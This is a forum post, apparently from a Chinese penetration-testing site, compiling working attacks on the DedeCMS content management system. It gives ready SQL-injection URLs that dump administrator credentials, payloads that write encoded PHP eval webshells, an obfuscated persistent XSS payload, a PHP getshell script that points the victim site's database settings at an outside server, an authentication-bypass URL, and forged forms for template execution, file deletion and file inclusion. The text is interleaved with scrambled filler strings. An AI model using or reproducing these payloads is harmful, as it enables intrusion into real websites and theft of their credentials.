中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结
5 L5 M9 y) R6 ^% i/ Z! _
Dedecms 5.6 rss注入漏洞$ V9 T3 L) z% T% l7 m+ j- v
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
  o& e7 D" u9 ]  y
" L: L% g' z: @! V- U7 i, u2 d

  [# Q* C# ^- o( t- ?# W# j  e# e0 T$ M2 x4 [  j" j# c
/ A/ X+ L% f& b3 N- A; y

2 |6 u0 l" ^8 k+ o' K
3 s6 g, @3 _$ r
# l$ x8 y& l* h) UDedeCms v5.6 嵌入恶意代码执行漏洞; W7 r2 W+ K6 ?8 y! I
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
* W5 `' @; K& e发表后查看或修改即可执行* i. C, a) w1 U
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}9 W  D! R' R! S% q% }# I" C
生成x.php 密码xiao,直接生成一句话。
  I0 ]8 G; ]9 e/ k8 u( k3 `2 a( Y* Q
! h" e! O3 H, ?9 ]# d, t3 ^2 H/ }- m( y( l) G1 z- P8 x1 C
* ]% n" L) k/ T% R( N
: Y2 C7 \: L: s, ^$ ]

* @8 V  n7 s" a& `% F7 T& ]
& L: S$ R& y' C+ H: P7 v1 p9 c7 r
" d$ u4 ~. K8 g" ~! `  j5 B
4 T, L- u; l+ o. X( KDede 5.6 GBK SQL注入漏洞  v4 a- ~  `1 ~/ ~: N/ w# E
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';$ B! r/ I! h" |7 j5 a
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
( N! C) D7 g% g* \: O5 o4 Phttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
1 R) \  n, u( k0 g8 N, F, ^9 K1 m4 |+ k+ w+ D' ~8 B8 v! X
# y- f) z2 x8 ?8 C: y; `( f

/ U8 x9 C% k; c5 d' {. M, _$ w- I/ h4 h% w" L5 ]
) e' x: f9 H$ E- C! b

! _" C$ S1 ~) t4 y* Q: ]2 `
% t  B; L9 P7 f/ r: Y9 x
& N# F  t& F' k! h  i% oDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
5 q2 C/ I  I- I: A9 w! n9 ]  [- M! G* zhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
* X3 I1 e1 Q3 q7 a( {9 r2 Y' Q# K$ m9 ^
- K9 c/ p3 A" W, P+ Q( Y- B/ g

7 k# R' }5 P" J- w+ @& C! w+ ~
% h& I6 q0 G6 J7 F. l
& I* C, l7 ?7 G6 m$ k2 \; ?1 |9 C' S+ z1 S# X% J2 i' l" E
DEDECMS 全版本 gotopage变量XSS漏洞  m4 G% Q0 H, ^! Y. i* e7 ?
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
4 p, b( c" B% z* |6 ^http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="$ }& l; X8 l1 F: t) [

1 n# L# s" I8 m. A/ ~8 R% E8 t6 t6 z% n, N
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 4 ]# w/ d* Q8 _' J7 k
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda8 t3 |: [' y4 C( D+ s
6 P0 e* S( J  Y4 Y% Y
! X7 f  i8 j% ^  @# y
http://v57.demo.dedecms.com/dede/login.php
$ \% C( w) w7 w: L9 q: H  K! I: r5 e; @7 ~- E' c

( w+ H+ g3 I% [" }1 }color=Red]DeDeCMS(织梦)变量覆盖getshell
: m' y; u7 e- K#!usr/bin/php -w
4 G' \" [+ o& D# t; n7 E/ \<?php
. {7 U/ b) _3 ]& Terror_reporting(E_ERROR);
- h( \# ~2 y( I9 P# dset_time_limit(0);2 n) l, e2 o& d' Z+ U
print_r('! D6 L% p& z5 q- B
DEDEcms Variable Coverage
9 D, w0 Q& W. f0 l, u& hExploit Author: www.heixiaozi.comwww.webvul.com
0 Z+ g, C' d/ |- {7 _5 V% s);$ r# M& Z: m, A% J+ {8 I" \- K
echo "\r\n";; j& E7 {3 I! Z- J4 M/ T- J
if($argv[2]==null){
3 V1 m# t$ h3 ]7 _' @. ~8 j; pprint_r('
5 Y( L6 L! |9 j; c3 c$ S+---------------------------------------------------------------------------+: o0 \" l+ F/ v+ K) P2 k9 ^
Usage: php '.$argv[0].' url aid path) |, m/ e5 b8 \6 ]
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/7 r, q; B# E% I% W" r# e0 d# L' T
Example:
: D! A# A5 M# M# [6 ~0 Hphp '.$argv[0].' www.site.com 1 old' `# N& p4 r/ u* \& z. Y: A' [
+---------------------------------------------------------------------------+
% o. v9 W- |- U6 }: ~');
6 P5 ^* T1 w8 J( gexit;
% ~! v" d+ {5 i}
4 o+ J- E& `+ Y/ M6 T. b# e$url=$argv[1];
6 A1 A3 C  {! `, v, @, b1 ]$aid=$argv[2];
+ n" X" k) z: F( E! k6 C$path=$argv[3];
% F! E( A7 Z0 F7 |3 s5 c- R$exp=Getshell($url,$aid,$path);. i: B) A  {( p! c$ Z) [7 ^
if (strpos($exp,"OK")>12){9 v; I% M1 J5 T* d% v, R
echo "
3 m3 d- }! o$ w: [# iExploit Success \n";
: H$ q! n% N: ^+ W! x+ x$ d" V$ ?, ]if($aid==1)echo "& F( m. J* H5 p3 Y) h
Shell:".$url."/$path/data/cache/fuck.php\n" ;) l6 k/ j# U$ P1 }( d- g
/ J8 u/ A- @# s1 P* |+ G) J% ^

  F% J% x$ z, Z% F# a2 nif($aid==2)echo "/ t& r' r' i! m4 C# @! B/ Q
Shell:".$url."/$path/fuck.php\n" ;( i4 Z. }1 P0 e7 O% w2 `/ g9 O

" w6 N: ?5 a' H
9 @$ n6 h6 D, F7 wif($aid==3)echo "5 l* H% J8 f% n1 G) h+ T
Shell:".$url."/$path/plus/fuck.php\n";4 A' a% a. Q! e
! W7 y  t4 S, h- o# N% o" B4 j

+ Y; t6 d; n" ?4 v2 N" y}else{0 v) c) K/ K. p
echo "
# s; x/ {; y4 r6 i- p% \( hExploit Failed \n";
6 f+ h7 R/ ]3 m# L5 a}
' B: N6 Q4 b" M3 Xfunction Getshell($url,$aid,$path){
% f) |- e5 w: r  {, j) F$id=$aid;2 b6 N2 ]) O* {  U; Z9 w8 G
$host=$url;4 ~/ y& }& ^7 B. _2 `+ c
$port="80";
# W6 t, i7 B' M/ c" x0 w$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
. n. Y; _$ E( Z0 W/ l$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";6 x1 s5 p2 j0 A3 B. W! W8 r) m
$data .= "Host: ".$host."\r\n";
' Q$ j2 x7 d3 M, u) m' h8 I+ V$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";! q, k: P& c- f* S; O4 m
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";- R8 K6 o+ D, f3 T# F
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
: ?* _! ^, g4 f  Y1 P& {+ N//$data .= "Accept-Encoding: gzip,deflate\r\n";
* x9 w4 c7 Q+ t$ N) Z5 W$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
6 A5 r. i' X5 M! [4 X3 n2 j$data .= "Connection: keep-alive\r\n";
/ x  n* v* h' P1 E# W$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
& C% h, {+ u; L$ v. p) z$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
0 F2 \2 A/ X3 R7 k2 @$ m2 P$data .= $content."\r\n";( ^: w, w. G, X8 C" x  h! l* `
$ock=fsockopen($host,$port);7 _+ I" q9 J' {9 J: m' {7 q+ n  O9 D
if (!$ock) {& o! t/ Y& e' m2 y, _
echo "0 p; M$ q0 |+ Y% x
No response from ".$host."\n";
8 ^1 z  l% Z* F/ x4 X}
5 v* B4 R+ Y! g3 Xfwrite($ock,$data);1 P$ @( H3 b- W3 |7 ^3 j2 U
while (!feof($ock)) {7 `% L& L+ S' b7 \+ {
$exp=fgets($ock, 1024);( R# W- R0 R  H" a, y
return $exp;+ u; }' {# m0 q) `
}
. K% E; C9 R' `0 [# f}1 Q9 v5 B, h, z) F& B

7 ?' D9 ?; L& Y$ S+ k: A
5 t: {3 p- p) e" ?7 i1 q+ J; s- }. _?>
* N, O8 i6 b0 z' F/ c  e  A+ [3 o. e/ ~3 y6 V8 \

# l* n2 A  a9 G' `' ^1 i
' k% d6 A/ k/ {9 C0 {7 @7 `2 n* H4 {- `& M

3 e: {& a3 \$ ?
: F/ K; _& v2 D7 r3 d9 y1 L. I
9 s9 ]3 f9 m2 Z! r9 v$ o
0 y7 E4 R# i- X( B; K/ u
3 l( q' [1 _2 s( @1 g4 y0 Y- U3 i0 l
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
7 O( U9 e( u( Y" M, yhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
. \) Z% L& z( _' ]. e; N' B  |( {  T$ s5 @  s* r, B5 N0 `
' K0 G; P+ S( v0 R
把上面validate=dcug改为当前的验证码,即可直接进入网站后台6 s8 a' `$ R3 t8 y

1 A2 `( E6 ?* M$ K+ m0 L) G5 a2 C
3 C& @/ O" |- [! `此漏洞的前提是必须得到后台路径才能实现5 S& w$ N2 E. l$ C* S  v+ x

  H+ w, |- g& n* D& s0 _! C3 C  R3 @: \8 J+ |1 M6 G% h1 I
8 s8 v) f6 r! W; x, h5 [

6 S+ P. w2 P' t% s# g: r. g( r+ A! F; j& ^) Z& C
& z' A: O' q: [: T2 }
5 A4 G: F  R# u& }: z4 K, d

  {. x! r9 @( B
; X, q4 ]( K! w' W3 j
, u$ s$ {# b- {: {- X+ o$ r) tDedecms织梦 标签远程文件写入漏洞, l; g. r8 {5 a( X5 m
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');$ g+ [3 J! z! _9 O
* A/ W- g/ w( S8 ?# y
3 S# R7 \3 {: j# }
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 / m7 e) W# S+ |3 Y
<form action="" method="post" name="QuickSearch" id="QuickSearch">
, t4 s  m4 s. ^/ U<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
( Y, d* Q) G2 F/ u& T$ r! b* Z/ A* r$ n<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />) K9 r8 t6 n- r, D* F9 |2 @  w
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
; Y! u4 Z6 F2 i6 B3 f, q<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
' }5 D2 d( g7 B; O9 Z" D, E<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
4 n! d) M2 ^% a8 G* @% G* m<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
0 Z" n1 Z( P6 c% y( B1 z+ C6 V5 [<input type="text" value="true" name="nocache" style="width:400">8 p  x0 Z1 h5 \* b3 X/ H: b/ f6 p1 K
<input type="submit" value="提交" name="QuickSearchBtn"><br />( C$ o0 I! r" s" y
</form>+ E- ^& G: E# M. G
<script>
7 O- }. y$ J% jfunction addaction()2 \* s% H3 j4 G" I
{) H# ]2 W( [, S! i
document.QuickSearch.action=document.QuickSearch.doaction.value;
6 r3 j- ]  `9 l0 p: q" t7 ~}$ `5 x% t& y% C' y7 a
</script>
2 v* G2 C2 p( }/ Q; p' O- U+ ~5 z& l  T, }7 e: d  b2 f
* }, B" E2 h5 R$ f# X) b! i# O
; E; ]4 i8 r9 M; [% b6 p

( E( B& P- E' ]: p) @, |9 d+ E, E( c$ D% \  W* D! |
* x+ q+ R) n# X0 V
8 F/ R' x. e. E2 E$ u! g" D
& c9 D6 l. w' u3 G% G

  X% {) {0 p$ k+ T7 A  s3 W5 o9 ~" b& N" t" f5 V& T/ i$ [7 R* S
DedeCms v5.6 嵌入恶意代码执行漏洞! S1 g. k  t% A+ E# f
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行( M( l) Z6 B/ d+ P+ I
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
6 _  {# a# ~+ f2 _( ?% b, n生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
3 Q' B0 U, x) |5 E7 D: ]- \Dedecms <= V5.6 Final模板执行漏洞
6 h) b6 n1 C1 V: O( C注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
, e7 b* s3 W8 Auploads/userup/2/12OMX04-15A.jpg
! t2 D$ j. A0 _
" B% |) V& H! q5 x" _! A7 I' C% _( b9 ~3 A0 I/ e
模板内容是(如果限制图片格式,加gif89a):9 \: c8 V4 H5 K
{dede:name runphp='yes'}
0 \7 q' N1 G: j$fp = @fopen("1.php", 'a');+ z( A7 c' K& K' V3 d5 g- c+ R* Q$ y) R
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");" Y2 d2 U+ [+ d" x- T
@fclose($fp);3 o. C3 m. X: F$ Q! I; E
{/dede:name}
4 ~9 Z8 x# t& W0 {9 |; }2 修改刚刚发表的文章,查看源文件,构造一个表单:& O  J7 S5 M; u8 ?; ]3 w
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
$ s5 Z+ x# U6 s# O. V  J<input type="hidden" name="dopost" value="save" />
3 q% s+ e3 t& w  a9 A  T' M<input type="hidden" name="aid" value="2" />: A0 c! n# ~0 [' u/ N
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
, Q( o5 u$ J' S+ h* L<input type="hidden" name="channelid" value="1" />
0 y4 X, V3 u' k8 L; ~8 B<input type="hidden" name="oldlitpic" value="" />
& ?6 `7 u2 V* o. q& d7 M# a5 X<input type="hidden" name="sortrank" value="1275972263" />  q* ]! j& ?7 C2 C/ l: C3 K
% ]. T$ y; u/ `2 s) f/ m& V/ g
. I; K1 [- J! v, K8 C- U
<div id="mainCp">
7 L9 u% Q! g) F; f<h3 class="meTitle"><strong>修改文章</strong></h3>$ p8 i) b! l, M4 S& }- r2 s

9 J9 Z3 T9 k2 O3 [5 w1 }7 S8 Q. |) |! z! P
<div class="postForm">* ]  o% T5 g5 W6 z9 `
<label>标题:</label>. k3 L9 n) m1 W5 Q0 ?
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
0 W: W: B9 V% H2 x, p* O1 @3 ^8 q, a: @$ b% ^$ M1 M& s& c
  A3 X6 m  {! j
<label>标签TAG:</label>
( U2 X$ |2 b0 Y9 S<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
, G% r6 p6 B3 Z& F( i0 `0 u6 A
8 p* A( Y0 W1 {4 L$ e" w$ a+ }* ^1 w3 Q! J
<label>作者:</label>
5 f% x' ?2 j( p* Q<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
: k+ y- |" T' j
  L$ I- G! b" }' b
& a( Y# L& B; n<label>隶属栏目:</label>' G* ]' n& t' S) J  ^1 W4 g
<select name='typeid' size='1'>
4 f% X- ~9 `) V. O: k/ V<option value='1' class='option3' selected=''>测试栏目</option>+ v. `4 U- E" c) h2 Y+ X1 \
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)( m4 n1 U0 z4 C- x" _
; }2 J. o7 u, G, d/ \: t( C* v
4 l9 v2 m' ~; Y
<label>我的分类:</label>
; @5 W8 K0 I9 C; h4 W4 @7 y<select name='mtypesid' size='1'>
! t8 s: |7 D( }& y$ b7 a8 y<option value='0' selected>请选择分类...</option>
' X0 t2 _! ^2 b<option value='1' class='option3' selected>hahahha</option>5 u% q( p5 y# |+ t
</select>/ X- `, r  ^6 v1 `8 B  i8 F6 @
( B9 V6 \; }) u6 Y% J

  `3 V1 F4 k- @' U. h<label>信息摘要:</label>/ N% R; R" ]' L1 n8 L
<textarea name="description" id="description">1111111</textarea>+ ]2 {! v& v* Y9 d) m. f
(内容的简要说明)
5 ~) ^  \0 ~# s# S
- u- }0 X5 B% W
" H- _8 B! D( }2 W% D$ P<label>缩略图:</label># C* f$ D) H& l
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>" W5 p" K3 d# O0 @0 h
3 r. G0 S" D4 C7 Z% @
/ b( m: Q& \: R/ r  @# G3 v3 v8 z$ M0 H$ @
<input type='text' name='templet'3 e0 |9 a+ Q/ T0 |
value="../ uploads/userup/2/12OMX04-15A.jpg">+ _6 G  d9 w1 d# T4 F6 q
<input type='text' name='dede_addonfields'
( }! Y- H- X7 X* ^5 Avalue="templet,htmltext;">(这里构造)' g5 R6 D1 \' j5 O% T- Y
</div>
# B4 k1 w% z+ d, P
: P# S/ Y+ F& I' G' _! J7 T
1 d3 p5 J4 {! p4 `0 x$ z0 G4 r8 [# \<!-- 表单操作区域 -->
, T: e2 O" d  I, P7 l& M<h3 class="meTitle">详细内容</h3>
, T! u% C# V; B+ K% H
* c6 ]- w- O$ I) W# U9 H6 `8 \
/ _. v* ^' s; ]) l<div class="contentShow postForm">
$ h. N+ q' z  k7 o7 a1 i7 @<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>7 p# I. D! D7 G( [6 s6 y* U
8 ]6 w: |" _7 O. J
$ [9 y4 ]  X1 I5 Q
<label>验证码:</label>
8 p! I. x* j6 I% S; q  k- J<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
6 d3 j# ^3 z* O) ~4 Q<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
% N) v- ]5 z" E) x) e) z* D2 Y0 L

; j- y: n5 Z8 @4 l# a<button class="button2" type="submit">提交</button>
3 ?7 H9 \1 g: Y<button class="button2 ml10" type="reset">重置</button>; R* T7 C' e3 j
</div>$ A" `5 F: H- W9 t& b3 T
$ h; X* L$ ^% w1 m# z- D
- [+ ]. f" V' f+ n; |
</div>
* S+ o) p: D3 |9 a! l8 d, N, I) j; h/ r& @8 a
& k2 S! L  w! }& N/ |
</form>
& e+ p& F. k+ I, @: M+ J$ L9 P5 D2 n5 y, k4 T% S7 g

9 E% i0 \7 d5 o. F: _# @2 i9 W提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:8 u, A+ u0 v* Z
假设刚刚修改的文章的aid为2,则我们只需要访问:) @: h5 G$ N. B5 @, y9 t
http://127.0.0.1/dede/plus/view.php?aid=2: W" p+ X( i- f/ h# R7 m1 K
即可以在plus目录下生成webshell:1.php
  C% J2 g/ P, R3 K; p& W; q
7 |; O7 T. h8 j' \7 Z. p  O
  A) E0 u/ H( l# x7 c3 \8 z- W) \& G% Q2 I& ^! ?+ b
5 X! g% Y- r* k# s( j
6 i2 i3 j. A6 ~) g+ _3 c
: _7 l5 u/ o5 P# P, a/ ]) B
8 O% y$ Q7 [8 F2 Z' v

9 Z3 F9 O  C+ L5 n# n" S- d$ v& L  z
: E* g- j$ P; G7 d" Q* N% d( z4 F, j9 ]. C; Q5 W, K
* y  {0 a0 X: J* V
" y6 |" O8 Y  \# b  O
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
$ S# q4 k$ z( X: i1 }$ l' K7 wGif89a{dede:field name='toby57' runphp='yes'}
) S2 e$ u9 v7 h  P: t1 f1 O3 Nphpinfo();0 a; n$ V% F, i9 M
{/dede:field}1 h1 G" i4 v$ B) ~
保存为1.gif& }5 W. z% S. F, w
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> * p) O( `0 a& W* T3 l8 T  L+ }* r
<input type="hidden" name="aid" value="7" /> ( \4 ^4 ?  P4 U5 H+ P$ F, |6 D4 b7 n
<input type="hidden" name="mediatype" value="1" /> + n2 z* R9 A" l  z
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 1 N9 q# e* z  }: V8 R; G
<input type="hidden" name="dopost" value="save" /> " e0 k$ f; K' V" g
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ! \1 @* a7 h4 [; L2 v: C1 e! W
<input name="addonfile" type="file" id="addonfile"/>
5 `0 D( A4 x6 p* q' ?<button class="button2" type="submit" >更改</button>
" L/ R1 m$ \' k, p3 q* u</form>
7 t0 K& U" F% l" G( K8 @' B  H- V& c5 i" e9 t) l8 b8 w3 z

9 a8 B7 m) M9 e& A. N0 Z构造如上表单,上传后图片保存为/uploads/userup/3/1.gif, a; p; w/ y8 I0 E( g
发表文章,然后构造修改表单如下:
( a  P. m" c5 f5 q& v
: k) Q, R* M3 X; n# ^  J. S2 ], F9 Q0 r: ^9 N8 P, ]
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
' h* P  r3 B4 w9 ]* ^2 o<input type="hidden" name="dopost" value="save" />
1 ]/ q! T  _# J1 z+ r<input type="hidden" name="aid" value="2" />
# d/ }8 ~' q3 b3 `8 S, `6 M2 E7 ^<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> : ]) {! h: B- m
<input type="hidden" name="channelid" value="1" />
- b+ d4 T- p0 t7 G+ a: y' f( f<input type="hidden" name="oldlitpic" value="" /> ( C3 [8 O- M2 R, N6 n
<input type="hidden" name="sortrank" value="1282049150" /> - X( }# h/ j8 ?9 m* K
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 1 v$ G5 h$ b  S
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
4 I* u& z2 _/ i' \<select name='typeid' size='1'>
8 Q# K" R3 Q* w! \8 H7 R' z1 y<option value='1' class='option3' selected=''>Test</option>
3 b0 }" ^5 Q5 b$ D: U. d<select name='mtypesid' size='1'>
) _% L4 v8 _4 {5 e<option value='0' selected>请选择分类...</option> . z4 t) V$ s& g# N
<option value='1' class='option3' selected>aa</option></select>
9 q4 c, _5 i' }% z8 e: C) N<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ; S" e: r5 l8 F* V1 ?4 k
<input type='hidden' name='dede_addonfields' value="templet"> - U8 J- Z9 ~0 R9 x1 ]  `7 Y
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
: a! r8 |$ Q: \3 Q. i: R2 s  V4 @<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> " S* L8 \6 i. U
<button class="button2" type="submit">提交</button>
6 x. Q* f9 j, H% Z) ~5 G3 B</form>) _" F. w& K) x2 j" i$ }* U* ]' n9 c

- h4 f1 Q% `$ w7 U) g# e% y" f; a. q$ e. K- {2 k1 L

$ ]  n5 n1 ]: y$ |% H& ?
0 K! s3 H4 T: n7 G/ `4 h. Q) h* r+ @7 \# Z- O8 P

0 |) ^8 t3 E/ \) c3 X  E0 V. k
6 ]  C# F# y( v. Y( p: I
9 v( \8 e8 a' ?9 N$ K9 x. B2 }5 S; C& h7 M( _. C  I
, E" `; C/ T& L# o, ?

. w' `' b9 @. R7 o# F+ L& ?4 v0 [1 {, J) ~, U
织梦(Dedecms)V5.6 远程文件删除漏洞# p) K6 \  a1 k% s0 [" i6 D+ U5 E
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif3 ~- d* c, l8 v! Y

3 g$ j9 E% D. C% C9 Y% `& p3 Y& Q9 `, f2 o3 r
6 L. T) K# p1 {, l/ u

) ^1 W/ @& t6 x  g* b) L* u
* w/ \! t9 ~2 {* _; b
$ {3 F; p# n- {5 F3 R) H( R3 C, |. [7 A+ \1 ?8 x' O6 J3 @
( R7 R1 t% _  @7 _" e9 X7 {

. |/ q; i. O( Z0 W) M! o* X. {, n% M7 Q0 g( J
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
* b; a$ u8 }2 O9 F' uhttp://www.test.com/plus/carbuya ... urn&code=../../  f2 z4 l% t" @7 V" i0 y* i6 s
7 y- g: z2 {% k' j

. B& J0 b) `- @+ I; z
. o9 x, g' I! w, E) c# l, ^- [" {9 Z5 Y* F: x! {& K

2 K4 H5 l; O' r8 u% z- E8 s/ k/ k# G( Z7 k! K) D1 S

4 Q9 `# b' G  c& y; Q+ e
5 L( F- Z3 ?2 J* ~  V
, L+ S; l5 e6 e
2 Z7 c3 b* ^7 J4 rDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ; I# g* d8 Z  w5 y: v
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`- n2 I% B2 n9 y7 [
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD52 _/ n; {( g3 j9 Z  Y  g3 A: F
4 h* D& i6 Q, w; F' L3 }* m. w
2 A9 b  z5 a- R) M! Q5 ^0 X

4 g8 [4 r& V% J, {0 [5 Q% K' w8 ?/ p1 [$ M8 X$ }: m- f
$ p( z0 k# P+ J1 |0 h
, C3 n1 i  J" P: W4 x9 }
( ?4 a" @; J7 v# H% s

7 J  G  F/ e9 m# ]: S% q/ r% o6 o4 m' S0 X+ C/ J' t

% l9 i0 C2 F, l8 U, R织梦(Dedecms) 5.1 feedback_js.php 注入漏洞; v; v5 V1 o* L2 [+ ?
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
* C! Q; p( D% c9 D. I9 f9 `( B+ M  g2 w* n, S: h
9 H! O. h( @* j4 J0 W/ T5 e

# `( e. `7 o6 _
8 W) B; z+ c2 `2 d: ?4 e0 n. _
